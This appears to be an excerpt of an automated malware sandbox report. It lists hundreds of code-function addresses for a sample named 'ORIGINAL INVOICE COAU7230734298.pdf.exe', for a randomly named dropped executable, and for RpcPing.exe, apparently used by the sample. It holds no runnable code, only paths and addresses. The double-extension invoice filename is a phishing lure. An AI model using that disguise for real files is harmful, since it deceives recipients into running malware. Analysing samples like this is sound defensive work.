            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_004163403_2_00416340
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_004163433_2_00416343
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_004023003_2_00402300
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_004024E03_2_004024E0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_0040FCA33_2_0040FCA3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_0040DD203_2_0040DD20
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_0040DD233_2_0040DD23
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_0042E5F33_2_0042E5F3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_0040DE693_2_0040DE69
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE01AA3_2_01AE01AA
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD41A23_2_01AD41A2
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD81CC3_2_01AD81CC
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A101003_2_01A10100
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABA1183_2_01ABA118
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA81583_2_01AA8158
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB20003_2_01AB2000
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE03E63_2_01AE03E6
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2E3F03_2_01A2E3F0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADA3523_2_01ADA352
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA02C03_2_01AA02C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC02743_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE05913_2_01AE0591
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A205353_2_01A20535
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ACE4F63_2_01ACE4F6
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC44203_2_01AC4420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD24463_2_01AD2446
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1C7C03_2_01A1C7C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A207703_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A447503_2_01A44750
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3C6E03_2_01A3C6E0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A229A03_2_01A229A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AEA9A63_2_01AEA9A6
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A369623_2_01A36962
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A068B83_2_01A068B8
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E8F03_2_01A4E8F0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A228403_2_01A22840
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2A8403_2_01A2A840
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD6BD73_2_01AD6BD7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADAB403_2_01ADAB40
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1EA803_2_01A1EA80
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A38DBF3_2_01A38DBF
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1ADE03_2_01A1ADE0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2AD003_2_01A2AD00
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABCD1F3_2_01ABCD1F
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0CB53_2_01AC0CB5
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A10CF23_2_01A10CF2
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20C003_2_01A20C00
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9EFA03_2_01A9EFA0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A12FC83_2_01A12FC8
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A62F283_2_01A62F28
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A40F303_2_01A40F30
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC2F303_2_01AC2F30
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A94F403_2_01A94F40
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A32E903_2_01A32E90
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADCE933_2_01ADCE93
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADEEDB3_2_01ADEEDB
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADEE263_2_01ADEE26
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20E593_2_01A20E59
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2B1B03_2_01A2B1B0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AEB16B3_2_01AEB16B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A5516C3_2_01A5516C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0F1723_2_01A0F172
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD70E93_2_01AD70E9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADF0E03_2_01ADF0E0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ACF0CC3_2_01ACF0CC
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A270C03_2_01A270C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A6739A3_2_01A6739A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD132D3_2_01AD132D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0D34C3_2_01A0D34C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A252A03_2_01A252A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC12ED3_2_01AC12ED
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3D2F03_2_01A3D2F0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3B2C03_2_01A3B2C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABD5B03_2_01ABD5B0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE95C33_2_01AE95C3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD75713_2_01AD7571
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADF43F3_2_01ADF43F
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A114603_2_01A11460
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADF7B03_2_01ADF7B0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD16CC3_2_01AD16CC
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A656303_2_01A65630
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB59103_2_01AB5910
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A299503_2_01A29950
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3B9503_2_01A3B950
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A238E03_2_01A238E0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8D8003_2_01A8D800
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3FB803_2_01A3FB80
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A95BF03_2_01A95BF0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A5DBF93_2_01A5DBF9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADFB763_2_01ADFB76
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A65AA03_2_01A65AA0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABDAAC3_2_01ABDAAC
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC1AA33_2_01AC1AA3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ACDAC63_2_01ACDAC6
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A93A6C3_2_01A93A6C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADFA493_2_01ADFA49
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD7A463_2_01AD7A46
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3FDC03_2_01A3FDC0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD7D733_2_01AD7D73
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A23D403_2_01A23D40
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD1D5A3_2_01AD1D5A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADFCF23_2_01ADFCF2
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A99C323_2_01A99C32
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADFFB13_2_01ADFFB1
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A21F923_2_01A21F92
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_019E3FD53_2_019E3FD5
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_019E3FD23_2_019E3FD2
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADFF093_2_01ADFF09
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A29EB03_2_01A29EB0
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036F6C017_2_036F6C01
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036F8BDE7_2_036F8BDE
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036FF27E7_2_036FF27E
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036FF27B7_2_036FF27B
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036F89BE7_2_036F89BE
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036F89B57_2_036F89B5
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_0370109E7_2_0370109E
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_0371752E7_2_0371752E
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036F6DA47_2_036F6DA4
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036F6C5E7_2_036F6C5E
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AE03E68_2_03AE03E6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A2E3F08_2_03A2E3F0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADA3528_2_03ADA352
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AA02C08_2_03AA02C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AC02748_2_03AC0274
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AE01AA8_2_03AE01AA
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD41A28_2_03AD41A2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD81CC8_2_03AD81CC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A101008_2_03A10100
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ABA1188_2_03ABA118
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AA81588_2_03AA8158
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AB20008_2_03AB2000
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A1C7C08_2_03A1C7C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A207708_2_03A20770
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A447508_2_03A44750
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A3C6E08_2_03A3C6E0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AE05918_2_03AE0591
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A205358_2_03A20535
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ACE4F68_2_03ACE4F6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AC44208_2_03AC4420
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD24468_2_03AD2446
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD6BD78_2_03AD6BD7
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADAB408_2_03ADAB40
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A1EA808_2_03A1EA80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A229A08_2_03A229A0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AEA9A68_2_03AEA9A6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A369628_2_03A36962
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A068B88_2_03A068B8
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A4E8F08_2_03A4E8F0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A228408_2_03A22840
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A2A8408_2_03A2A840
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A9EFA08_2_03A9EFA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A12FC88_2_03A12FC8
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A62F288_2_03A62F28
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A40F308_2_03A40F30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AC2F308_2_03AC2F30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A94F408_2_03A94F40
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A32E908_2_03A32E90
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADCE938_2_03ADCE93
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADEEDB8_2_03ADEEDB
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADEE268_2_03ADEE26
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A20E598_2_03A20E59
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A38DBF8_2_03A38DBF
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A1ADE08_2_03A1ADE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A2AD008_2_03A2AD00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ABCD1F8_2_03ABCD1F
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AC0CB58_2_03AC0CB5
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A10CF28_2_03A10CF2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A20C008_2_03A20C00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A6739A8_2_03A6739A
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD132D8_2_03AD132D
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A0D34C8_2_03A0D34C
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A252A08_2_03A252A0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AC12ED8_2_03AC12ED
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A3D2F08_2_03A3D2F0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A3B2C08_2_03A3B2C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A2B1B08_2_03A2B1B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AEB16B8_2_03AEB16B
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A5516C8_2_03A5516C
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A0F1728_2_03A0F172
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD70E98_2_03AD70E9
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADF0E08_2_03ADF0E0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ACF0CC8_2_03ACF0CC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A270C08_2_03A270C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADF7B08_2_03ADF7B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD16CC8_2_03AD16CC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A656308_2_03A65630
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ABD5B08_2_03ABD5B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AE95C38_2_03AE95C3
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD75718_2_03AD7571
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADF43F8_2_03ADF43F
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A114608_2_03A11460
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A3FB808_2_03A3FB80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A95BF08_2_03A95BF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A5DBF98_2_03A5DBF9
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADFB768_2_03ADFB76
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A65AA08_2_03A65AA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ABDAAC8_2_03ABDAAC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AC1AA38_2_03AC1AA3
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ACDAC68_2_03ACDAC6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A93A6C8_2_03A93A6C
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADFA498_2_03ADFA49
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD7A468_2_03AD7A46
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AB59108_2_03AB5910
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A299508_2_03A29950
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A3B9508_2_03A3B950
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A238E08_2_03A238E0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A8D8008_2_03A8D800
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADFFB18_2_03ADFFB1
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A21F928_2_03A21F92
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_039E3FD58_2_039E3FD5
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_039E3FD28_2_039E3FD2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADFF098_2_03ADFF09
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A29EB08_2_03A29EB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A3FDC08_2_03A3FDC0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD7D738_2_03AD7D73
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A23D408_2_03A23D40
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03AD1D5A8_2_03AD1D5A
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03ADFCF28_2_03ADFCF2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A99C328_2_03A99C32
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_032717C08_2_032717C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_0326C7478_2_0326C747
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_0326C7508_2_0326C750
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_0326AB368_2_0326AB36
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_0326C9708_2_0326C970
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_0326A9ED8_2_0326A9ED
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_0326A9F08_2_0326A9F0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03274E308_2_03274E30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_0328B2C08_2_0328B2C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_0327300D8_2_0327300D
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_032730108_2_03273010
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03D3038E8_2_03D3038E
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03D3E3348_2_03D3E334
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03D3E7EC8_2_03D3E7EC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03D4552D8_2_03D4552D
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03D454BD8_2_03D454BD
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03D3E4538_2_03D3E453
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03D3CAE88_2_03D3CAE8
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03D3CA8A8_2_03D3CA8A
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03D3D8588_2_03D3D858
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058CF4899_2_058CF489
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058D0CD99_2_058D0CD9
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058D0CD69_2_058D0CD6
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058CA4199_2_058CA419
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058CA4109_2_058CA410
